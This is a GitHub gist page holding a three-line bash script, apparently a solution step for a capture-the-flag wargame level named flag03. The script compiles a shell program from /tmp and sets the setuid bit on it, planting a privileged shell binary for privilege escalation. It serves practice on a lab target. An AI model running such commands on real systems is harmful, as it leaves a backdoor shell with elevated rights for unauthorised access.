Skip to content

Instantly share code, notes, and snippets.

@int0x33
Created January 29, 2019 18:11
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save int0x33/2250a09b136a1516c1dd3a20bf10fb4c to your computer and use it in GitHub Desktop.
Save int0x33/2250a09b136a1516c1dd3a20bf10fb4c to your computer and use it in GitHub Desktop.
#!/bin/bash
cc /tmp/shell.c -o /home/flag03/shell
chmod +s /home/flag03/shell
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment